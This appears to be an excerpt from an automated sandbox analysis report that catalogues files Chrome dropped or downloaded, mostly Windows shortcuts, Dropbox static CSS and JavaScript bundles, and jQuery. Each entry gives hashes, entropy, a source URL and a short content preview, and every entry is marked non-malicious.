                                                                        Preview:L..................F.@.. ...$+.,....#..)....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V8Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 24 16:14:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.9951184419648427
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:26A01B746BE4CDEF199F8D259D4CACB4
                                                                        SHA1:8C46C8B2E965BA49459CF66EA879BB0F87E1BA48
                                                                        SHA-256:A2DCAC50BA06F171E2F26B02412D160F19C782F4F81485FB128714B5EBF5F327
                                                                        SHA-512:0FBBE3DF0D58E20926DCA2FE58A793242AA0E069F81591BF980F23DB00DDBA6124A72F8331C3CDD3876CCC9F28054845E0D7E31A40B2D1CAB5189B7DD35C6AA2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....G..)....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V8Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 24 16:14:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2679
                                                                        Entropy (8bit):4.005003658840437
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A3D58BBFA4BBE28EA6DA444236D27F57
                                                                        SHA1:03D9F05FCDEDC1BAC43C2798D576B000871913A8
                                                                        SHA-256:2E3ECCA25E243CBA1C0CD28F4645FBB7ABE64154F5668751D51608E795909843
                                                                        SHA-512:2DD4DBE529380DFECF4B6098B4B7C7021F662D55EE297F8802B370D76B7DDEE417FDD927BA1C14F8F1C95FD17E739B7D1552B411E02F06187A54CFE87B606448
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.......)....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V8Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5191)
                                                                        Category:dropped
                                                                        Size (bytes):5584
                                                                        Entropy (8bit):5.153299766798503
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:54A3FA7EE62B4C673380CB4CD4AF8AD8
                                                                        SHA1:642079B3281E9598DA01E317AC3B3CD85A3C1F2B
                                                                        SHA-256:843AF50E67E763844262E7A7278E521BCE52B6392273F60F1BE529DD7E0C957A
                                                                        SHA-512:BB063C903EF300277E0E7A3CFE5D0B1F2183ED987342E6E571D4C55AD184ED7A58D9D42728D04701FA1D7FE5033CB0A2200289A57DA813F242418B4948D0D17D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6b4a9708-076f-3c47-890d-95434cbfb9f1")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var l=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,l.get?l:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var l=n(t);e.CommentReadLine=e=>l.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},l.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M14.5 6.75c0-.45.04-.867.121-1.25H6.25A2.25 2.25 0 0 0 4 7.75v7A2.25 2.25 0 0 0 6.25 17H7v2.492L11.736 17h6.014A2.249 2.249 0 0 0 20 14.75v-3.871c-.383.08-.8.121-1.25.121a7.09 7.09 0 0 1-.25-.004v3.754a.75.75 0 0 1-.75.75h-6.386L8.5 17
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):106
                                                                        Entropy (8bit):4.671678894464906
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0F743B21686079274C833BFD9CF8E0A1
                                                                        SHA1:938370F8F27985AAAA0F16C58745A0E1836D70DF
                                                                        SHA-256:B24641124259C5F35FD75D9363D5C17173CE82207F8AD3EBF1B270C9A40EB68E
                                                                        SHA-512:3EE8D3ABF93F4E18F3B83461BA6942453044D664BAC0ADD8E7A1571B57D18FB161EDFE3B2568DC91708399F4A296BA79F6F23EA747068414E24D0CD9FB5C8926
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/report_flag-vflD3Q7IW.css
                                                                        Preview:.report-flag{position:fixed;bottom:7px;left:10px;z-index:999}.report-flag.preview-type-excel{bottom:25px}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1973)
                                                                        Category:downloaded
                                                                        Size (bytes):2363
                                                                        Entropy (8bit):5.3773360051986225
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E41E64F0E9F126A43E4EBF1C746A48E8
                                                                        SHA1:D76F9BF69BD089AED0DC32595BA02E1AD4649DE9
                                                                        SHA-256:E1B087B1BA1AF6CE4AC888369EAECF3119DB4F6E072288770540ADD6EF41E664
                                                                        SHA-512:DE36B2604861A095B5C251CD0C0608B4F6E87D3D593BC66829C10D2A10866E28BCA7A3C53510FF515039CE5B7463B39D92D982D637A6EF7EAA806D40118A2285
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_lock-vfl5B5k8O.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="4e9d9e7b-809d-3c09-9907-63ce19f9ed82")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.GoogleExternalLogo=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12.162 3.975A8.027 8.027 0 0 0 4.134 12a8.027 8.027 0 0 0 8.028 8.025c6.694 0 8.202-6.215 7.574-9.362h-7.577v2.675h5.175A5.348 5.348 0 0 1 6.809 12a5.35 5.35 0 0 1 5.35-5.35c1.343 0 2.567.499 3.507 1.317l1.9-1.9a7.998 7.998 0 0 0-5.404-2.092Z",fill:"currentColor",vecto
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1616)
                                                                        Category:downloaded
                                                                        Size (bytes):2006
                                                                        Entropy (8bit):5.443683086928224
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F247B7051CD333B51ECB2F013ACF9317
                                                                        SHA1:74714F30308E6DC86ACC5B72521EA32F5E528884
                                                                        SHA-256:8FA03DB435315D7DE52A088A51B96E1EA3999CCE769B5CFCAA675273E517FDBB
                                                                        SHA-512:292FEE6269A5DB8E2E8946B7A82FC33CD3A84B2D7CFD7665BABBE4DD3B16E5701455CE8CEDABCB2831016A4621DFD0732CDBC11D21214E2A8AA329EB8EB9CCAD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_file-vfl8ke3BR.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2f6822a5-3b2f-3923-bc62-c330110a0c1f")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.CalendarLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M3.5 5v11.25a2.25 2.25 0 0 0 2.25 2.25h12A2.249 2.249 0 0 0 20 16.25V5H3.5ZM5 6.5h13.5V8H5V6.5Zm13.5 9.75a.75.75 0 0 1-.75.75h-12a.75.75 0 0 1-.75-.75V9.5h13.5v6.75Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),r.createElement("path",{d:"M11.75 12.5a.75.75 0 1 0-.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (31230)
                                                                        Category:downloaded
                                                                        Size (bytes):31610
                                                                        Entropy (8bit):4.893067377177533
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:930A3D23AFAB1A7E43F8FC7A3BEF3C6E
                                                                        SHA1:6C3A113F80F94537AEA9EA0C46E0AFD517A3B03B
                                                                        SHA-256:6E63F8E834788775788E7AB4D72E719100FAAB16963BBEEDD725EC4572121E47
                                                                        SHA-512:ACC8C237B1EA3F88D64807A8FD3D2D49E69CF3D1F79059D546E5CB44CA38D8B11396DEF16535ABA4551DCF08E7F99B53C88CBDCE67F18312C678B0832341B3E9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/foundations-tokens-vflkwo9I6.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-foundations@3.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..:root{--type__title__medium--lineheight:28px;--type__title__medium--fontweight_strong:500;--type__title__medium--fontweight:400;--type__title__medium--fontsize:22px;--type__title__standard--lineheight:28px;--type__title__standard--fontweight_strong:500;--type__title__standard--fontweight:400;--type__title__standard--fontsize:22px;--type__title__small--lineheight:26px;--type__title__small--fontweight_strong:500;--type__title__small--fontweight:400;--type__title__small--fontsize:16px;--type__title__large--lineheight:36px;--type__title__large--fontweight_strong:500;--type__title__large--fontweight:400;--type__title_
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 1090288
                                                                        Category:dropped
                                                                        Size (bytes):310742
                                                                        Entropy (8bit):7.998845232409512
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:2FD71DB50779742B59203CA65843FDC6
                                                                        SHA1:5E8ABDDC6E3940B6BEC05E5BEF43143610D6DCCC
                                                                        SHA-256:B03239DBD8E0474AC6682DFCDE2065595EE6FF9B5462A750310C09142A2D99E3
                                                                        SHA-512:AEC06D6568EDD3EE4D656E1633F229DD2517FF64B56CBF82DBC17C614AE534260BD82F59BD027B8AE60F899FF617B9353062D4ADC0D5CB4FDE2DFCA124305B21
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............kw.6.0.]...y...aE.5..z....Lb..N;3../..$.P....x,=..Y...$AIN..Cc..nlll..d...p}.........~.....}...ry7..E6....9....G......1&O..&..W~y.iDR.cA....a...}..L..t.,.......YL........aw.^Z.o....A.Q?...]d..x.....n.q......+....n...w........=.....Z.ZG.GG...?...o^....J'G....R.h...P.h....o.I.|...g...(b4.....f1...%e.......{.C.......s.O.....N._..$..a.....>.!.........9..pJ....F.,f......*......g.pf...;.F>.3g.'.!.B2.NL....I.iH...O.8.....O..{.8..vB6.v...`.&-..r>..y.....b.].N.$.n..........^..Z}...2'%.^.)...g...I..8.~rX..IJH.p..~Jc...r26.O8%.M..&>,x.hz.qV........^..Og7.7.:....../...g.?.].^^.8.........W7......?.._^.G.......6Oa.,ub.'...n.)Ma..9..q.:......g..IJc:q.$...lk.`.A7I<.9.....M....I....|J.......'.G.-..G.,..[.C.=..E.s...,..^k..S..o...z>........|...;x{............(.....#.%....>.......{>...{{G>Z@...........GS.a....}o.d.G.(<....,.....q.G.P.VTx..z.{.>z..z'=........`....C.].{o.G>.....{.>.........VL.-.~..w..t....4;..._a....C.].9.......d..`.Gg0..~.G..h.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (900)
                                                                        Category:dropped
                                                                        Size (bytes):1275
                                                                        Entropy (8bit):5.237229663123154
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5BAB16D77FC8E3B10F107C9A5C0533D8
                                                                        SHA1:3BDC9283C30ED9E9ADB0034D7A8C69EBBBA18830
                                                                        SHA-256:DAC145DDB66DDFF92DEB5E2EDCAA1815A8A236DCD8203C49E27BD22C9B420DCB
                                                                        SHA-512:9F6B8214B3002BFDC4B6CA15D8F9D2244A49C103979BC2A1E1CCB69202084DEC493BB0D0497ED19873FBAE8AB5C85C8B780924629A74220B269BAA816DBD17E3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e00fd35f-03e7-34fb-b985-ed35bf58d4f6")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function s(e){return e&&e.__esModule?e:{default:e}}var n=s(t);e.listenToStores=function(e,t,s){return class extends n.default.Component{constructor(r){super(r),this.displayName=`StoreListener(${null!=e.displayName?e.displayName:"Unknown"})`,this.wrapped=n.default.createRef(),this.getWrappedComponent=()=>this.wrapped.current,this.getStores=()=>t,this._handleStoreChanged=()=>{const e=s(this.props,t);return this.setState({childProps:e})},this.state={childProps:s(r,t)}}componentDidMount(){for(const e of Object.keys(t)){t[e].add_change_listener(this._handleStoreChanged)}return this.setState({childProps:s(this.props,t)})}componentWillUnmount(){for(const e of Object.keys(t)){t[e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1727)
                                                                        Category:downloaded
                                                                        Size (bytes):1728
                                                                        Entropy (8bit):5.079458543466473
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1FAC30C2F785E8257D8E4DB8AE4A2902
                                                                        SHA1:955BA8113C4BBE01F42E548E807EA6C33207084C
                                                                        SHA-256:94B06B7DEAE3398A35DCF272C96E9117693CF18FE4430953FA2721FE8613EEE7
                                                                        SHA-512:792C0CD9DAD746D01534F11E07931F0552884641FE52A8421F35BBAE997849133E6E2C000575B11AD50BC756CBF5B43052030254C852409E29A0347C09F5EE78
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css
                                                                        Preview:body,input,textarea,select,button,.normal{font-family:"Open Sans","lucida grande","Segoe UI",arial,verdana,"lucida sans unicode",tahoma,sans-serif;font-size:13px;color:var(--dig-color__text__base, #000);font-weight:normal}.maestro body:not(.dig-Button),.maestro input:not(.dig-Button),.maestro textarea:not(.dig-Button),.maestro select:not(.dig-Button),.maestro button:not(.dig-Button),.maestro .normal:not(.dig-Button){font-family:var(--dig-type__bodyfontstack, "Atlas Grotesk Web","Atlas Grotesk",AtlasGrotesk,sans-serif)}body{background-color:var(--dig-color__background__base, #fff);min-height:100%;margin:0;padding:0}a,a *{cursor:pointer;outline:none}a{color:var(--dig-color__primary__base, #0061ff);text-decoration:none}a:focus{text-decoration:underline}a img{border:0}p,h1,h2,h3,h4,h5{margin:0 0 1em 0;line-height:1.6em}h1{font-size:18pt;font-weight:normal;margin:10px 0}h2{padding-top:3px;padding-bottom:10px;margin-bottom:4px;font-size:10pt}h3{padding:0;margin:0;font-size:10pt}h4{margin:0 0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65107)
                                                                        Category:downloaded
                                                                        Size (bytes):321245
                                                                        Entropy (8bit):5.450384845507533
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0D4D85267CEB52B84DE9EAAB409A2FF8
                                                                        SHA1:219A8B66F7CB5E25D868C55AEAAF5E12B8667A60
                                                                        SHA-256:4C2BFC45488A131B2E548872CDA7BDEF17AF39CE2283C0B0B65828060ACBB78C
                                                                        SHA-512:D4E4CF288301F0BAF42938859953B1855F85F4555F7F7E49B78823F92371AF79928CAA57D21F79A8778EC82D2809B52AE7F4154A28AA5EC8C3252343B4B099E7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/pithos/privacy_consent.bundle-vflDU2FJn.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8c1c03c8-6a94-3b77-9c6d-38b640826e77")}catch(e){}}();.(() => {const define = dbxPithosConfig._define, require = dbxPithosConfig._require; /*! For license information please see privacy_consent.bundle.js.LICENSE.txt */.define((()=>(()=>{var e={2495:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>s});var r=n(4338),o=n.n(r),i=n(3077),a,l=n.n(i)()(o());l.push([e.id,'._ccpa-iframe_1amvv_1,._consent-iframe_1amvv_2{background-color:transparent;border:none;bottom:0;color-scheme:none;left:0;overflow:hidden;position:fixed;z-index:999999}._ccpa-iframe_1amvv_1._banner-visible_1amvv_13{bottom:24px;box-shadow:var(--dig-utilities__boxshadow__floating);left:24px;width:600px}@media (max-width:648px){._ccpa-iframe_1amvv_1._banner-visible_1amvv_13{bottom:12px;left:12px;width:calc(100% - 24px)}}._
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:downloaded
                                                                        Size (bytes):89501
                                                                        Entropy (8bit):5.289893677458563
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3030)
                                                                        Category:downloaded
                                                                        Size (bytes):3031
                                                                        Entropy (8bit):5.072541246708305
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7CD34B579C76D077847E1EB2C086CCAD
                                                                        SHA1:CD36C07AC7F488668A7EE34D8BEBEC596C192AF0
                                                                        SHA-256:A63B0861254D3FFB38AA35BCE52017B3095E5FA5D8A03E085C47A895AB51BAB7
                                                                        SHA-512:2B21B2278488F11A28990FF79260F071E8901D53CEB7645860A6A0035BBEED7C8CEACB8F538650A8C88ED3C2FAC722EBBE2C2AF5553ADCEE09445797A623E75D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css
                                                                        Preview:body,input,textarea,select,button,.normal{font-family:"Open Sans","lucida grande","Segoe UI",arial,verdana,"lucida sans unicode",tahoma,sans-serif;font-size:13px;color:var(--dig-color__text__base, #000);font-weight:normal}.maestro body:not(.dig-Button),.maestro input:not(.dig-Button),.maestro textarea:not(.dig-Button),.maestro select:not(.dig-Button),.maestro button:not(.dig-Button),.maestro .normal:not(.dig-Button){font-family:var(--dig-type__bodyfontstack, "Atlas Grotesk Web","Atlas Grotesk",AtlasGrotesk,sans-serif)}body{background-color:var(--dig-color__background__base, #fff);min-height:100%;margin:0;padding:0}a,a *{cursor:pointer;outline:none}a{color:var(--dig-color__primary__base, #0061ff);text-decoration:none}a:focus{text-decoration:underline}a img{border:0}p,h1,h2,h3,h4,h5{margin:0 0 1em 0;line-height:1.6em}h1{font-size:18pt;font-weight:normal;margin:10px 0}h2{padding-top:3px;padding-bottom:10px;margin-bottom:4px;font-size:10pt}h3{padding:0;margin:0;font-size:10pt}h4{margin:0 0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 133482
                                                                        Category:downloaded
                                                                        Size (bytes):42145
                                                                        Entropy (8bit):7.9941057104490865
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:2FA8C9D61F6593A1B1A1B944FF096759
                                                                        SHA1:A32CC047C7678794A1C01A9F8B44D6E6632E488F
                                                                        SHA-256:8AA48E50337A6EE06D3A30BD40FB40883FC34374FE0F3D64F0EC2E01B9A72D5D
                                                                        SHA-512:26C28CE4E94ACF7730A0AF09C8473D8484111A30228ADCBAD497CDEA23BDA8352B29644B4D3C9C47AF40717246B69DA858C0748A5B54E9BA92530A11A7CA8E72
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_admin~paper_admin_off_view_only~paper_binder~paper_bundle~paper_cloud_docs~paper_dashboard~pap~148eab67_8f64743c5e9cac8d9910.FP7ibKAgyLVK5Mf2ptnfnpCnZhL81shfe86d9-ZT2p4.js.gz
                                                                        Preview:............i..8....~E...J%..v.*..Rv..vy......h.@..kqQ.L.Y2k&.Lf..e.Lf.{..w..o.....>.. A.e..$_$.........l..........``....^<~....>.(.#...7.8.p...p|.......d.....D.....X.yj"....D.$..(...0;<H.t...]....W.9#z.v....$.....q*. ..8.{...t=.m~.......p.G\d.....w}.P.y.on.0.......v2?K..\...~7..8.6.C1^O.!O.D.4>.e.fU=o....z.g<..x=.1.?.}..;....Eoa.D....Y....&[.u..\V......&.$.t.....{;...)?:[....."....$....a.q`..g2..2>....<I%O.uw}g..8..?....&.k0.1M..s:....p.|wh..}5..C...Nb........Y...d6.)|.X.*...-:aW....m}I.l.t.z.]z.w..z.o}q.....=:e....].~...k[...l0p......8.t....~..-.Ey...,..`...A.d....E.s..T......'...0.:t>..3....7<..7.)Nu6r...g#..TI..d.C1r.I.x'.|..U.N.&...U.]=.#..R.q..P&...i..Q8.9t.Jx...p.y.J{..#......Q.A..T...t..*.Y..q(.k%.4..C.XigG..l..gU.+..U.{.4c.......6E........Y...[f../}.z.|yQ}...K.|...j.....^V./b...K.g.....[..U;............|}.f.}... ..id......)..6..}>.:..CR@)9$d}...U.5.t......L.SY...Y.....|..m.....g..)....{.;Y...'.I..L..mn..7.f.Q;
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2372)
                                                                        Category:downloaded
                                                                        Size (bytes):2762
                                                                        Entropy (8bit):5.281812826030082
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7D64D74D8D5EC818E88BCF9BA01921E0
                                                                        SHA1:1E1FC061F48409FFE07712C8803FD385D8B1C9AD
                                                                        SHA-256:BF6AFDC61C72333E5F2E63BDA4E67F17DF89987B0326FCCB34F59F350D0D928D
                                                                        SHA-512:79BAC5344355C2B7E23AD4488C0AC0A6AAECB19D82D66739FE35906A7133D477C314BC6A8C2B4FF9FF59C9D9C7BA54417E5A7A71EA48D49F535151C98B7FA691
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_undo-vflfWTXTY.js
